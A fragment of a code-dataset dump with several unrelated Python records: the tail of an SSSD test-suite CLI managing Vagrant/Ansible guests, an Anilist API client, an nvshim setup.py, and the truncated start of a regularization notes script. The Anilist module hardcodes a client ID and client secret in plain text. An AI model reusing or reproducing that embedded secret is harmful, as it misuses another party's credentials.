install 'ansible' first.\")\n return\n\n params.append('--extra-vars')\n params.append('LIBVIRT_STORAGE=%s' % args.pool)\n self.ansible.run('prepare-host.yml', ['localhost'], params)\n\n def installAnsible(self):\n if self.shell.isCommandAvailable('ansible-playbook'):\n return True\n\n return self.shell.installCommand('ansible')\n\n\nclass ProvisionGuestsCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n '--all', action='store_true', dest='all',\n help='Provision all machines (default)'\n )\n\n self.parser.add_argument(\n '--ad', action=UniqueAppendConstAction, dest='guests',\n const='ad', help='Provision AD machine'\n )\n\n self.parser.add_argument(\n '--ad-child', action=UniqueAppendConstAction, dest='guests',\n const='ad-child', help='Provision AD child machine'\n )\n\n self.parser.add_argument(\n '--ipa', action=UniqueAppendConstAction, dest='guests',\n const='ipa', help='Provision IPA machine'\n )\n\n self.parser.add_argument(\n '--ldap', action=UniqueAppendConstAction, dest='guests',\n const='ldap', help='Provision LDAP machine'\n )\n\n self.parser.add_argument(\n '--client', action='append_const', dest='guests',\n const='client', help='Provision client machine'\n )\n\n self.parser.add_argument(\n '-e', '--enroll', action='store_true', dest='enroll',\n help='Enroll client to all domains'\n )\n\n def run(self, args, params=[]):\n if not args.enroll:\n params.append('--skip-tags=enroll-all')\n\n limit = ['all'] if args.guests is None else args.guests\n self.ansible.run('prepare-guests.yml', limit, params)\n\n\nclass EnrollCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n def run(self, args, params=[]):\n self.ansible.run('enroll.yml', ['all'], params)\n\n\nclass PruneBoxCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.re = re.compile(\n \"^[^']+'([^']+)' \\(v([^)]+)\\).*$\",\n re.MULTILINE\n )\n\n def run(self, args, params=[]):\n result = self.vagrant.run(\n ['box', 'prune'],\n params,\n stdout=subprocess.PIPE\n )\n\n for (box, version) in self.re.findall(result.stdout.decode('utf-8')):\n imgfile = '%s_vagrant_box_image_%s.img' % (\n box.replace('/', '-VAGRANTSLASH-'),\n version\n )\n imgfile = '%s/%s' % (self.pool, imgfile)\n\n print('Box %s, version %s is outdated.' 
% (box, version))\n print(' removing %s' % imgfile)\n\n if os.path.exists(imgfile):\n os.remove(imgfile)\n\n\nclass CreateBoxCommand(Command):\n class Task:\n def __init__(self, name, guests, task):\n self.name = name\n self.guests = guests\n self.task = task\n\n class Box:\n def __init__(self, createbox, guest, args):\n now = datetime.date.today()\n\n self.version = now.strftime('%Y%m%d.{}'.format(args.version))\n self.os = args.linux if guest in createbox.linux else args.windows\n self.name = 'sssd-%s-%s-%s' % (self.os, guest, self.version)\n self.file = '%s.box' % self.name\n self.outdir = args.output\n self.path = '%s/%s' % (self.outdir, self.file)\n self.metapath = '%s/%s.json' % (self.outdir, self.name)\n self.img = '%s/sssd-test-suite_%s.img' % (createbox.pool, guest)\n self.backup = '%s.bak' % self.img\n\n if guest in createbox.linux:\n self.vgfile = '%s/boxes/vagrant-files/linux.vagrantfile'\n else:\n self.vgfile = '%s/boxes/vagrant-files/windows.vagrantfile'\n\n self.vgfile = self.vgfile % createbox.dir\n\n def checksum(self, block_size=65536):\n sha256 = hashlib.sha256()\n with open(self.path, 'rb') as f:\n for block in iter(lambda: f.read(block_size), b''):\n sha256.update(block)\n\n return sha256.hexdigest()\n\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.boxvar = EnvVar('SSSD_TEST_SUITE_BOX')\n\n self.parser.add_argument(\n '-l', '--linux-os', action='store', type=str, dest='linux',\n help='Linux OS name', default='linux'\n )\n\n self.parser.add_argument(\n '-w', '--windows-os', action='store', type=str, dest='windows',\n help='Windows OS name', default='windows'\n )\n\n self.parser.add_argument(\n '-u', '--url', action='store', type=str, dest='url',\n help='URL where the resulting boxes will be stored',\n default='http://'\n )\n\n self.parser.add_argument(\n '-o', '--output', action='store', type=str, dest='output',\n help='Output directory where new boxes will '\n 'be stored (default = %s/boxes)' % self.dir,\n default=self.dir + '/boxes'\n )\n\n self.parser.add_argument(\n '-v', '--version', action='store', type=str, dest='version',\n help='Version number appended to current date (default = 01)',\n default='01'\n )\n\n self.parser.add_argument(\n '--all', action='store_const', dest='guests', const=self.guests,\n help='Create boxes of all guests (default)'\n )\n\n self.parser.add_argument(\n '--ad', action=UniqueAppendConstAction, dest='guests',\n const='ad', help='Create AD box'\n )\n\n self.parser.add_argument(\n '--ad-child', action=UniqueAppendConstAction, dest='guests',\n const='ad-child', help='Create AD child box'\n )\n\n self.parser.add_argument(\n '--ipa', action=UniqueAppendConstAction, dest='guests',\n const='ipa', help='Create IPA box'\n )\n\n self.parser.add_argument(\n '--ldap', action=UniqueAppendConstAction, dest='guests',\n const='ldap', help='Create LDAP box'\n )\n\n self.parser.add_argument(\n '--client', action='append_const', dest='guests',\n const='client', help='Create client box'\n )\n\n self.parser.add_argument(\n '--from-scratch', action='store_true', dest='scratch',\n help='Destroy existing guests and provision new ones'\n )\n\n self.provision = [\n self.Task('Destroy guests', self.guests, self.taskDestroy),\n self.Task('Update boxes', self.guests, self.taskUpdate),\n self.Task('Bring up guests', self.guests, self.taskUp),\n self.Task('Provision guests', [], self.taskProvision),\n ]\n\n self.tasks = [\n self.Task(\n 'Make all images readable',\n self.guests, self.taskMakeReadable\n ),\n self.Task(\n 
'Halting all guests',\n [], self.taskHalt\n ),\n self.Task(\n 'Zero out empty space on linux machines',\n self.linux, self.taskZeroDisk\n ),\n self.Task(\n 'Create boxes',\n self.guests, self.taskCreateBox\n ),\n self.Task(\n 'Create metadata',\n self.guests, self.taskCreateMetadata\n )\n ]\n\n def run(self, args, params=[]):\n print('This operation may take hours to finish. Be patient.')\n print('It may ask you a sudo password for command: '\n 'chmod a+r %s/*.' % self.pool)\n\n if not args.guests:\n args.guests = self.guests\n\n tasks = self.tasks\n if args.scratch:\n tasks = self.provision + self.tasks\n\n total = len(tasks)\n current = 1\n\n self.boxvar.set('yes')\n try:\n for task in tasks:\n print('[%d/%d] %s' % (current, total, task.name))\n current += 1\n\n if not task.guests:\n task.task(args)\n continue\n\n for guest in task.guests:\n if guest in args.guests:\n box = self.Box(self, guest, args)\n self.step(guest, 'Task started')\n task.task(guest, box, args)\n except:\n raise\n finally:\n self.boxvar.restore()\n\n def step(self, guest, description):\n print(' [%s] %s' % (guest, description))\n\n def taskDestroy(self, guest, box, args):\n self.vagrant.run(['destroy', guest])\n\n def taskUpdate(self, guest, box, args):\n self.vagrant.run(['box', 'update', guest])\n\n def taskUp(self, guest, box, args):\n self.vagrant.run(['up', guest])\n\n def taskProvision(self, args):\n limit = ['all'] if args.guests is None else args.guests\n self.ansible.run(\n 'prepare-guests.yml', limit, ['--skip-tags=enroll-all']\n )\n\n def taskMakeReadable(self, guest, box, args):\n self.shell.run(['sudo', 'chmod', 'a+r', box.img])\n\n def taskHalt(self, args):\n self.vagrant.run(['halt'])\n\n def taskZeroDisk(self, guest, box, args):\n '''\n Zeroing disks takes lots of space because it needs to fill the\n whole space in the sparse file. 
Therefore it is better to do\n it one guest after another.\n '''\n self.step(guest, 'Starting guest')\n self.vagrant.run(['up', guest])\n self.step(guest, 'Zeroing empty space')\n self.ansible.run('prepare-box.yml', [guest])\n self.step(guest, 'Halting guest')\n self.vagrant.run(['halt', guest])\n self.step(guest, 'Compressing image')\n self.shell.run(['mv', '-f', box.img, box.backup])\n self.shell.run(['qemu-img', 'convert', '-O', 'qcow2',\n box.backup, box.img])\n self.shell.run(['rm', '-f', box.backup])\n\n def taskCreateBox(self, guest, box, args):\n self.shell.run(['mkdir', '-p', box.outdir])\n self.vagrant.run([\n 'package', guest,\n '--vagrantfile=%s' % box.vgfile,\n '--output=%s' % box.file\n ])\n self.shell.run(['mv', '-f', '%s/%s' % (self.dir, box.file), box.path])\n self.step(guest, 'Box stored as: %s' % box.path)\n\n def taskCreateMetadata(self, guest, box, args):\n self.step(guest, 'Computing checksum of %s' % box.path)\n\n if args.dryrun:\n return\n\n sha = box.checksum()\n meta = textwrap.dedent('''\n {{\n \"name\": \"sssd-{0}-{1}\",\n \"description\": \"SSSD Test Suite '{0}' {1}\",\n \"versions\": [\n {{\n \"version\": \"{2}\",\n \"status\": \"active\",\n \"providers\": [\n {{\n \"name\": \"libvirt\",\n \"url\": \"{3}/sssd-{0}-{1}-{2}.box\",\n \"checksum_type\": \"sha256\",\n \"checksum\": \"{4}\"\n }}\n ]\n }}\n ]\n }}\n ''')\n\n meta = meta.format(box.os, guest, box.version, args.url, sha).strip()\n\n with open(box.metapath, \"w\") as f:\n f.write(meta)\n\n\nclass VagrantCloudCommand(Command):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n '-t', '--token', action='store', type=str, dest='token',\n default=None, help='Vagrant cloud authentication token'\n )\n\n self.parser.add_argument(\n '-u', '--username', action='store', type=str, dest='username',\n default=None, help='Vagrant cloud username or organization name '\n 'where boxes are stored'\n )\n\n\nclass VagrantCloudSetupCommand(VagrantCloudCommand):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n def run(self, args, params=[]):\n data = {}\n\n if args.token is not None:\n data['token'] = args.token\n\n if args.username is not None:\n data['username'] = args.username\n\n with open('%s/vg-cloud.json' % self.dir, \"w\") as f:\n f.write(json.dumps(data))\n\n\nclass VagrantCloudListCommand(VagrantCloudCommand):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n def run(self, args, params=[]):\n cloud = VagrantCloud(self.dir, args.token, args.username)\n boxes = cloud.list()\n\n for box in boxes:\n print('- {:50s} ({})'.format(box.tag, box.version))\n\n\nclass VagrantCloudUploadCommand(VagrantCloudCommand):\n def __init__(self, subparser, name, help):\n super().__init__(subparser, name, help)\n\n self.parser.add_argument(\n '--ipa', action='store', type=str, dest='ipa', default=None,\n help='Path to IPA box generated by create-box command'\n )\n\n self.parser.add_argument(\n '--ldap', action='store', type=str, dest='ldap', default=None,\n help='Path to LDAP box generated by create-box command'\n )\n\n self.parser.add_argument(\n '--client', action='store', type=str, dest='client', default=None,\n help='Path to client box generated by create-box command'\n )\n\n self.re = re.compile(\n \"^sssd-(.+)-.+-(.+)\\.box$\",\n re.MULTILINE\n )\n\n def run(self, args, params=[]):\n boxes = {\n 'ipa': args.ipa,\n 'ldap': args.ldap,\n 'client': args.client\n }\n\n cloud = 
VagrantCloud(self.dir, args.token, args.username)\n\n for guest, box in boxes.items():\n if box is None:\n continue\n\n (os, version) = self.parseBoxPath(box)\n\n boxname = '%s-%s' % (os, guest)\n\n print('[%s] Creating box %s (%s)' % (guest, boxname, version))\n cloud.boxCreate(\n boxname, 'sssd-test-suite: %s %s machine' % (os, guest)\n )\n cloud.versionCreate(\n boxname, version,\n 'See: https://github.com/SSSD/sssd-test-suite'\n )\n cloud.providerCreate(boxname, version, 'libvirt')\n print('[%s] Uploading box %s' % (guest, box))\n cloud.providerUpload(boxname, version, 'libvirt', box)\n cloud.versionRelease(boxname, version)\n print('[%s] Finished' % guest)\n\n def parseBoxPath(self, path):\n matches = self.re.findall(os.path.basename(path))\n if not matches or len(matches) > 1:\n raise ValueError('Invalid box path: %s' % path)\n\n return matches[0]\n\n\ndef main():\n # Split arguments on --\n args = sys.argv[1:]\n params = []\n\n if '--' in args:\n params = args[args.index('--') + 1:]\n args = args[:args.index('--')]\n\n # Prepare argument parser\n parser = argparse.ArgumentParser(\n description='SSSD Test Suite Command Line Interface.',\n epilog='All parameters placed after -- will be passed to underlying '\n 'vagrant or ansible calls. For example '\n '\"sssd-test-suite rdp ad -- -g 90%\"'\n )\n\n parser.add_argument(\n '-c', '--config', action='store', type=str, dest='config',\n help='Path to SSSD Test Suite configuration file',\n default=None\n )\n\n parser.add_argument(\n '--debug', action='store_true', dest='debug',\n help='Print commands that are executed.'\n )\n\n parser.add_argument(\n '--dry-run', action='store_true', dest='dryrun',\n help='Do not perform any changes. Only print commands that '\n 'would be executed.'\n )\n\n subparser = parser.add_subparsers(title='Commands')\n\n # Setup commands\n BasicVagrantCommand(subparser, 'status', 'Show current state of guest machines')\n BasicVagrantCommand(subparser, 'up', 'Bring up guest machines')\n BasicVagrantCommand(subparser, 'halt', 'Halt guest machines')\n BasicVagrantCommand(subparser, 'destroy', 'Destroy guest machines')\n BasicVagrantCommand(subparser, 'reload', 'Restart guest machines')\n BasicVagrantCommand(subparser, 'resume', 'Resume suspended guest machines')\n BasicVagrantCommand(subparser, 'suspend', 'Suspend guest machines')\n SSHVagrantCommand(subparser, 'ssh', 'Open SSH to guest machine')\n RDPVagrantCommand(subparser, 'rdp', 'Open remote desktop for guest machine')\n ProvisionHostCommand(subparser, 'provision-host', 'Provision host machine')\n ProvisionGuestsCommand(subparser, 'provision', 'Provision guest machines')\n EnrollCommand(subparser, 'enroll', 'Enroll client to all domains')\n BasicVagrantCommand(subparser, 'update', 'Update vagrant box', command=['box', 'update'])\n PruneBoxCommand(subparser, 'prune', 'Delete outdated vagrant boxes')\n CreateBoxCommand(subparser, 'create-box', 'Create vagrant box')\n VagrantCloudSetupCommand(subparser, 'cloud-setup', 'Setup your vagrant cloud token and username')\n VagrantCloudListCommand(subparser, 'cloud-list', 'List boxes stored in vagrant cloud')\n VagrantCloudUploadCommand(subparser, 'cloud-upload', 'Upload boxes to vagrant cloud')\n\n # Parse arguments and run the given command\n args = parser.parse_args(args)\n\n UtilOptions.debug = args.debug\n UtilOptions.dryrun = args.dryrun\n\n if args.config:\n config = EnvVar('SSSD_TEST_SUITE_CONFIG')\n config.set(args.config)\n\n if hasattr(args, 'func'):\n args.func(args, params)\n else:\n parser.print_help()\n\nif 
__name__ == \"__main__\":\n main()\n","sub_path":"cli/sssd_test_suite.py","file_name":"sssd_test_suite.py","file_ext":"py","file_size_in_byte":22797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"335851425","text":"\"\"\"\nAnilist.py\nHandles all of the connections to Anilist.\n\"\"\"\n\nimport requests\nimport difflib\nimport traceback\nimport pprint\n\nANICLIENT = 'microline-1pfbw'\nANISECRET = 'ixezJaTKA11lb4wS69bavcKs9cK2jP'\n\nreq = requests.Session()\n\ntry:\n import Config\n ANICLIENT = Config.aniclient\n ANISECRET = Config.anisecret\nexcept ImportError:\n pass\n\naccess_token = ''\n\nescape_table = {\n \"&\": \" \",\n \"\\'\": \"\\\\'\",\n '\\\"': '\\\\\"',\n '/': ' ',\n '-': ' '\n #'!': '\\!'\n }\n\n#Anilist's database doesn't like weird symbols when searching it, so you have to escape or replace a bunch of stuff.\ndef escape(text):\n return \"\".join(escape_table.get(c,c) for c in text)\n\ndef getSynonyms(request):\n synonyms = []\n\n synonyms.append(request['title_english']) if request['title_english'] else None\n synonyms.append(request['title_romaji']) if request['title_romaji'] else None\n synonyms.extend(request['synonyms']) if request['synonyms'] else None\n\n return synonyms\n\n#Sets up the connection to Anilist. You need a token to get stuff from them, which expires every hour.\ndef setup():\n try:\n request = req.post('https://anilist.co/api/auth/access_token', params={'grant_type':'client_credentials', 'client_id':ANICLIENT, 'client_secret':ANISECRET})\n req.close()\n\n global access_token\n access_token = request.json()['access_token']\n except Exception as e:\n req.close()\n print('Error getting Anilist token')\n\n#Returns the list of all currently airing show\ndef getAnimeAiring():\n try:\n request = req.get(\"https://anilist.co/api/browse/anime/\", params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/browse/anime/\", params={'year':'2017', 'season':'fall', 'status':'currently airing', 'access_token':access_token}, timeout=10)\n req.close()\n\n #Of the given list of shows, we try to find the one we think is closest to our search term\n return request.json()\n\n except Exception as e:\n #traceback.print_exc()\n req.close()\n return None\n\n#Returns the closest anime (as a Json-like object) it can find using the given searchtext\ndef getAnimeDetails(searchText):\n try:\n sanitised_search_text = escape(searchText)\n\n request = req.get(\"https://anilist.co/api/anime/search/\" + sanitised_search_text, params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/anime/search/\" + sanitised_search_text, params={'access_token':access_token}, timeout=10)\n req.close()\n\n #Of the given list of shows, we try to find the one we think is closest to our search term\n closest_anime = getClosestAnime(searchText, request.json())\n\n if closest_anime:\n return getFullAnimeDetails(closest_anime['id'])\n else:\n return None\n\n except Exception as e:\n #traceback.print_exc()\n req.close()\n return None\n\n#Returns the anime details based on an id\ndef getAnimeDetailsById(animeID):\n try:\n return getFullAnimeDetails(animeID)\n except Exception as e:\n return None\n\n#Gets the \"full\" anime details (which aren't displayed when we search using the basic function). 
Gives us cool data like time until the next episode is aired.\ndef getFullAnimeDetails(animeID):\n try:\n request = req.get(\"https://anilist.co/api/anime/\" + str(animeID), params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/anime/\" + str(animeID), params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code == 200:\n anime = request.json()\n\n anime['genres'] = [genre for genre in anime['genres'] if genre]\n anime['synonyms'] = [synonym for synonym in anime['synonyms'] if synonym]\n\n return anime\n else:\n return None\n except Exception as e:\n #traceback.print_exc()\n req.close()\n return None\n\n#Given a list, it finds the closest anime series it can.\ndef getClosestAnime(searchText, animeList):\n try:\n animeNameList = []\n animeNameListNoSyn = []\n\n #For each anime series, add all the titles/synonyms to an array and do a fuzzy string search to find the one closest to our search text.\n #We also fill out an array that doesn't contain the synonyms. This is to protect against shows with multiple adaptations and similar synonyms (e.g. Haiyore Nyaruko-San)\n for anime in animeList:\n if 'title_english' in anime:\n animeNameList.append(anime['title_english'].lower())\n animeNameListNoSyn.append(anime['title_english'].lower())\n\n if 'title_romaji' in anime:\n animeNameList.append(anime['title_romaji'].lower())\n animeNameListNoSyn.append(anime['title_romaji'].lower())\n\n if 'synonyms' in anime:\n for synonym in anime['synonyms']:\n animeNameList.append(synonym.lower())\n\n listOfNameClose = difflib.get_close_matches(searchText.lower(), animeNameList, 1, 0.6)\n if len(listOfNameClose) < 1:\n return animeList[0]\n closestNameFromList = listOfNameClose[0]\n\n for anime in animeList:\n if (anime['title_english'].lower() == closestNameFromList.lower()) or (anime['title_romaji'].lower() == closestNameFromList.lower()):\n return anime\n else:\n for synonym in anime['synonyms']:\n if (synonym.lower() == closestNameFromList.lower()) and (synonym.lower() not in animeNameListNoSyn):\n return anime\n return None\n except:\n #traceback.print_exc()\n return None\n\n#Makes a search for a manga series using a specific author\ndef getMangaWithAuthor(searchText, authorName):\n try:\n request = req.get(\"https://anilist.co/api/manga/search/\" + searchText, params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/manga/search/\" + searchText, params={'access_token':access_token}, timeout=10)\n req.close()\n\n closestManga = getListOfCloseManga(searchText, request.json())\n fullMangaList = []\n\n for manga in closestManga:\n try:\n fullManga = req.get(\"https://anilist.co/api/manga/\" + str(manga['id']) + \"/staff\", params={'access_token':access_token}, timeout=10)\n req.close()\n\n if fullManga.status_code != 200:\n setup()\n fullManga = req.get(\"https://anilist.co/api/manga/\" + str(manga['id']) + \"/staff\", params={'access_token':access_token}, timeout=10)\n req.close()\n\n fullMangaList.append(fullManga.json())\n except:\n req.close()\n pass\n\n potentialHits = []\n for manga in fullMangaList:\n for staff in manga['staff']:\n isRightName = True\n fullStaffName = staff['name_first'] + ' ' + staff['name_last']\n authorNamesSplit = authorName.split(' ')\n\n for name in authorNamesSplit:\n if not (name.lower() in fullStaffName.lower()):\n isRightName = False\n\n if 
isRightName:\n potentialHits.append(manga)\n\n if potentialHits:\n return getClosestManga(searchText, potentialHits)\n\n return None\n\n except Exception as e:\n req.close()\n traceback.print_exc()\n return None\n\ndef getLightNovelDetails(searchText):\n return getMangaDetails(searchText, True)\n\n#Returns the closest manga series given a specific search term\ndef getMangaDetails(searchText, isLN=False):\n try:\n request = req.get(\"https://anilist.co/api/manga/search/\" + searchText, params={'access_token':access_token}, timeout=10)\n req.close()\n\n if request.status_code != 200:\n setup()\n request = req.get(\"https://anilist.co/api/manga/search/\" + searchText, params={'access_token':access_token}, timeout=10)\n req.close()\n\n closestManga = getClosestManga(searchText, request.json(), isLN)\n\n if (closestManga is not None):\n response = req.get(\"https://anilist.co/api/manga/\" + str(closestManga['id']), params={'access_token':access_token}, timeout=10)\n req.close()\n json = response.json()\n\n json['genres'] = [genre for genre in json['genres'] if genre]\n json['synonyms'] = [synonym for synonym in json['synonyms'] if synonym]\n\n return json\n else:\n return None\n\n except Exception as e:\n #traceback.print_exc()\n req.close()\n return None\n\n#Returns the closest manga series given an id\ndef getMangaDetailsById(mangaId):\n try:\n response = req.get(\"https://anilist.co/api/manga/\" + str(mangaId), params={'access_token':access_token}, timeout=10)\n req.close()\n return response.json()\n except Exception as e:\n req.close()\n return None\n\n#Used to determine the closest manga to a given search term in a list\ndef getListOfCloseManga(searchText, mangaList):\n try:\n ratio = 0.90\n returnList = []\n\n for manga in mangaList:\n alreadyExists = False\n for thing in returnList:\n if int(manga['id']) == int(thing['id']):\n alreadyExists = True\n break\n if (alreadyExists):\n continue\n\n if round(difflib.SequenceMatcher(lambda x: x == \"\", manga['title_english'].lower(), searchText.lower()).ratio(), 3) >= ratio:\n returnList.append(manga)\n elif round(difflib.SequenceMatcher(lambda x: x == \"\", manga['title_romaji'].lower(), searchText.lower()).ratio(), 3) >= ratio:\n returnList.append(manga)\n elif not (manga['synonyms'] is None):\n for synonym in manga['synonyms']:\n if round(difflib.SequenceMatcher(lambda x: x == \"\", synonym.lower(), searchText.lower()).ratio(), 3) >= ratio:\n returnList.append(manga)\n break\n return returnList\n except Exception as e:\n traceback.print_exc()\n return None\n\n#Used to determine the closest manga to a given search term in a list\ndef getClosestManga(searchText, mangaList, isLN=False):\n try:\n mangaNameList = []\n\n for manga in mangaList:\n if isLN and 'novel' not in manga['type'].lower():\n mangaList.remove(manga)\n elif not isLN and 'novel' in manga['type'].lower():\n mangaList.remove(manga)\n\n for manga in mangaList:\n mangaNameList.append(manga['title_english'].lower())\n mangaNameList.append(manga['title_romaji'].lower())\n\n for synonym in manga['synonyms']:\n mangaNameList.append(synonym.lower())\n\n closestNameFromList = difflib.get_close_matches(searchText.lower(), mangaNameList, 1, 0.60)[0]\n\n for manga in mangaList:\n if not ('one shot' in manga['type'].lower()):\n if (manga['title_english'].lower() == closestNameFromList.lower()) or (manga['title_romaji'].lower() == closestNameFromList.lower()):\n return manga\n\n for manga in mangaList:\n for synonym in manga['synonyms']:\n if synonym.lower() == closestNameFromList.lower():\n 
return manga\n\n return None\n except Exception as e:\n #traceback.print_exc()\n return None\n\nsetup()\n","sub_path":"AniListAPI.py","file_name":"AniListAPI.py","file_ext":"py","file_size_in_byte":12079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"175878104","text":"\"\"\"Setup project file\"\"\"\nimport os\nfrom datetime import datetime\nfrom typing import (\n Iterator,\n List,\n Set,\n)\n\nfrom setuptools import setup\n\nfrom src.nvshim import __version__ as PACKAGE_VERSION\nfrom src.nvshim.utils.constants import SHIMS as shims\n\n\ndef readme() -> str:\n \"\"\"Get all lines from read me file\"\"\"\n return \"\\n\".join(lines(\"README.md\"))\n\n\ndef lines(filepath) -> \"Iterator[str]\":\n \"\"\"Lines of a file generator\"\"\"\n with open(filepath, encoding=\"UTF-8\") as open_file:\n while True:\n line = open_file.readline()\n if line:\n yield line.strip()\n else:\n return\n\n\ndef get_requirements(filepath: str, visited: \"List[str]\") -> \"List[str]\":\n \"\"\"\n Get all pip requirements specified by a requirements file\n with support for nested requirements files\n\n :param filepath: path to requirements.txt file\n :param visited: mutable list of visited requirements.txt files\n :return: unordered list of requirements without versions\n \"\"\"\n requirements: \"Set[str]\" = set()\n filepath = os.path.realpath(filepath)\n rel_filepath = os.path.relpath(filepath)\n\n if filepath in visited:\n print(\"Skipping requirements:\", rel_filepath)\n print(visited)\n\n else:\n print(\"Parsing requirements:\", rel_filepath)\n visited.append(filepath)\n req_file_delim = \"-r\"\n req_package_delim = \"==\"\n requirements_dir = os.path.dirname(filepath)\n for line in lines(filepath):\n if line.startswith(\"#\"):\n continue\n if line.startswith(req_file_delim):\n nested_req_file = line.split(req_file_delim)[1].strip()\n nested_req_filepath = os.path.join(requirements_dir, nested_req_file)\n requirements.union(get_requirements(nested_req_filepath, visited))\n elif req_package_delim in line:\n requirements.add(line.split(req_package_delim)[0])\n\n return list(requirements)\n\n\ndef version_scheme(version) -> str:\n \"\"\"Convert version to version string\"\"\"\n if not os.getenv(\"CI\"):\n return PACKAGE_VERSION\n if version.exact:\n return version.format_with(\"{tag}\")\n return datetime.now().strftime(\"%Y.%m.%d.%H%M%S%f\")\n\n\nconsole_scripts = [\"nvm=nvshim.core.shim_nvm:main\"] + [\n f\"{s}=nvshim.core.shim:main\" for s in shims\n]\n\nsetup(\n author=\"Emmanuel Ogbizi-Ugbe\",\n author_email=\"iamogbz+pypi@gmail.com\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: End Users/Desktop\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development\",\n ],\n description=\"Automagically use the correct version of node\",\n entry_points={\"console_scripts\": console_scripts},\n include_package_data=True,\n install_requires=get_requirements(\"requirements/prod.txt\", []),\n keywords=\"node nvm node-shim shim shell nvm-shim\",\n long_description=readme(),\n long_description_content_type=\"text/markdown\",\n license=\"GNU\",\n name=\"nvshim\",\n packages=[\"nvshim\", \"nvshim.core\", 
\"nvshim.utils\"],\n package_dir={\"\": \"src\"},\n python_requires=\">=3\",\n setup_requires=[\"setuptools_scm\"],\n tests_require=get_requirements(\"requirements/test.txt\", []),\n url=\"http://github.com/iamogbz/nvshim\",\n # https://pypi.org/project/setuptools-scm/#configuration-parameters\n use_scm_version={\n \"local_scheme\": \"no-local-version\",\n \"version_scheme\": version_scheme,\n \"write_to\": \"./src/nvshim/__init__.py\",\n \"write_to_template\": '\"\"\"Current package version\"\"\"\\n__version__ = \"{version}\"\\n',\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5765093","text":"\n# coding: utf-8\n\n# 由于学习率太大,致使网络反向传播梯度过大,多数神经元权重置负,经过relu激活函数后,神经元权重置零,导致多数神经元坏死,网络呈现病态。后来降低了学习率,网络开始正常学习。\n\n# ## 正则化\n\n# 利用一条线将平面直角坐标系的两类数据点分开,如果线不能很好分开两类数据点,就是欠拟合,这是高偏差的情况;相反,如果线能非常完美分开两类数据点,会出现这条线只适用于这份数据,其它数据集的分类却不适用了,就是过拟合,这是高方差的情况。\n#\n# 如何做到线能合理分割数据集,适度拟合,即方差和偏差适中,就需要一系列的参数调整。\n\n# 模型训练的过程中,可以通过模型的训练准确度来判断算法的偏差高不高,如果偏差过高,就需要重新评估训练集,或者选择新的网络和更先进的算法,亦或者花费更多的时间进行网络训练。\n#\n# 但当使用验证集进行验证时候,发现模型预测的误差大大高于测试数据集的误差,这时候就需要注意模型过拟合的问题了,在数据较少的情况下,就需要使用正则化来减少过拟合了。\n\n# * 考虑如下情况:\n#\n# -- 逻辑回归成本函数$J$的最小值表达式为$min_{w, b}J(w, b)$;\n#\n# -- $w$和$b$是逻辑回归的两个参数,$w$是一个多维参数矢量, $b$是一个实数。\n\n# ### L1 正则化\n\n# -- $\\frac{\\lambda}{2m} \\times \\left|w\\right|$为正则化项;\n\n# $$J(w, b) = \\frac{1}{m}\\sum_{i=1}^{m}L(\\hat{y_i}, y_i) + \\frac{\\lambda}{2m}\\left|\\left|w\\right|\\right|_1$$\n\n# 如果使用L1正则化,$w$矩阵最终是稀疏的。\n\n# ### l2 正则化\n\n# -- $w$的欧几里德范数的平方等于$w_j$($j$值从$1$到$n_x$)平方的和,即$w^{T}w$;\n#\n# -- $\\frac{\\lambda}{2m} \\times w^{T}w$为正则化项;\n\n# $$J(w, b) = \\frac{1}{m}\\sum_{i=1}^{m}L(\\hat{y_i}, y_i) + \\frac{\\lambda}{2m}\\left|\\left|w\\right|\\right|^{2}_2$$\n\n# $w$可以表达高偏差问题,$b$只是一个常数,所以忽略不计。\n\n# $\\lambda$是正则化参数,通常使用验证集或者交叉验证集进行配置,同时倾向于将参数设置比较小,避免过拟合。\n\n# ###\n\n# ## 滑动平均模型\n\n# In[1]:\n\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom tensorflow.contrib.layers import xavier_initializer_conv2d\nimport datetime\nimport pandas as pd\n\n\n# In[2]:\n\n\ninput_size = 224\nkeep_prob = 0.5\nnum_classes = 120\nlr_decay = 0.95\nnum_gens_to_wait = 250.\nnum_epochs = 200000\nbatch_size = 16\nlearning_rate = 0.0001\nregularztion_rate = 5 / (2 * 9200)\nmoving_average_decay = 0.99\n\n\n# In[ ]:\n\n\ntraining_filepath = \"../datasets/dog-breed-identification/train/\"\nlabels_file = pd.read_csv('../datasets/dog-breed-identification/labels.csv', index_col = 'id')\nfilewriter_path = \"../Models/dog_breed_identification\"\ncheckpoint_path = \"../Models/dog_breed_identification\"\nweight_file = '../Models/dogs_vs_cats_vgg16/vgg16_weights.npz'\n\ntraining_file = 